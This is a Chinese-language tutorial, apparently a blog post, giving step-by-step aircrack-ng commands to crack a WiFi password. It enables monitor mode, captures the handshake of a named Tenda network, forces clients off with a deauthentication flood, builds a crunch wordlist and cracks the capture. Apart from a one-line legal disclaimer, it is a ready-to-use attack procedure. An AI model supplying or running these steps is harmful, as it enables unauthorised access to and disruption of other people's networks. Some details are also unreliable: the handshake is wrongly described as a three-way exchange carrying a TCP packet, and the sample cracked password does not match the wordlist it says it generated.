windows10下如何暴力破解wifi密码?暴力破解是一种穷举法,即将密码字典中的每个密码依次与握手包中的密码进行匹配,直至匹配成功。 wifi密码能否成功破解取决于密码字典本身是否包含密码。破解的时间取决于CPU的运算速度以及wifi密码本身的复杂程度。如果WiFi密码设置得足够复杂,即使有再好的密码字典,也可能需要数小时甚至数天的时间才能成功破解。 (暴力破解他人WiFi密码属于违法行为,本教程仅供大家参考)
提前准备破解工具:1.kali linux系统,本教程使用物理机上安装的linux系统(建议在虚拟机中操作)。
2.支持监听模式的无线网卡。本教材使用的是某宝购买的3070L网卡。
3.字典文件(如果你没有字典,没问题,稍后我会教你如何使用cruncl创建密码文件)。
暴力破解的具体步骤:1、使用ifconfig命令查看本地网卡名称。 eth0是有线网卡,wlan0(物理机)和wlan1(外部)是无线网卡。
2、使用airmon-ng命令检查网卡是否支持监听模式。
3. 使用airmon-ng start wlan1 命令启用网卡监控。网卡更多的是你自己的选择。这里我选择外网卡wlan1,使用ifconfig命令检查监听模式是否开启。如果无线接口wlan0变成wlan0mon,则表示监听模式开启。
4.使用airodump-ng wlan1mon命令扫描附近的wifi。扫描后,我们得到了一些关于wifi的信息。 BSSID是MAC地址,PWR是信号强度(信号越小信号越强),CH是信道。按ctrl+c 暂停扫描。
5. 使用命令airodump-ng -c 5 -w /root/cap/er8 --bssid C8:3A:35:8B:EA:40 wlan1mon 从WiFi 热点Tenda_8BEA40 抓包。
6.新建终端:输入命令aireplay-ng -0 5 -a C8:3A:35:8B:EA:40 wlan1mon
0是用deauth泛洪攻击WiFi设备的次数,0是无限制,-0
5表示攻击5次。攻击原理是:先让设备离线,设备会自动重新连接。在这个自动连接过程中,将进行三次握手,并发送一个TCP数据包(包含加密的密码数据)。
此时返回之前的终端就可以看到捕获到的tcp数据包了。
7、使用命令crunch打开字典生成软件,输入crunch 10 10 012 xy》/root/12345.txt(10 10表示制作10位密码,012表示密码包含数字012xy,/root /12345.txt代表密码文本存储的路径和名称)。
8、使用aircrack-ng -w /root/12345.txt /root/cap/er8-01.cap(ircrack-ng -w字典路径握手包路径)破解wifi密码。
9、密码破解成功,密码为(xxyy0011)